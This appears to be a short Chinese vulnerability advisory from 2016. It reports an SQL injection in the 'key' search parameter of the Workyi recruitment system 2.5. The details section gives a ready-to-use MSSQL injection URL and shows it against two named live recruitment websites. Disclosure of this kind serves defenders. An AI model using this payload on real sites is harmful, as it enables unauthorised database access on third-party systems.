workyi人才系统2.5版本/news/search.aspx 参数key存在SQL注入漏洞

2016-01-13T00:00:00
ID SSV:90387
Type seebug
Reporter kikay
Modified 2016-01-13T00:00:00

Description

0x01 框架介绍

工作易人才招聘系统是由华兴科技网络开发的一套高端人才系统,并通过了国家计算机版权认证中心的认可。由.NET+ MSSQL编写,网站模板采用DIV+CSS构成,兼容IE6/IE7/IE8、火狐等主流内核浏览器,当然也兼容IE内核的傲游、世界之窗、腾讯TT等浏览器。

该网站主要由企业招聘、万能采集、手机版、木马检测、一句求贤、最新求职、人才评测、视频简历、院校联盟、个人服务、企业服务、资讯中心几大部分组成。工作易人才招聘系统是面向中小企业和个人站长建站时,最具性价比的一套人才招聘系统。以《实用、稳定、低价》的特色占据市场的一席之地。采用微软的.Net最新技术开发。

官方主页:www.workyi.com

0x02 漏洞细节

漏洞处: /news/search.aspx?key=

利用方式:

http://site/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%

案例1:

http://www.hellojob.com.cn/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%

案例2:

http://www.nanlingjob.com/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%

0x03 参考链接

http://www.wooyun.org/bugs/wooyun-2015-0115094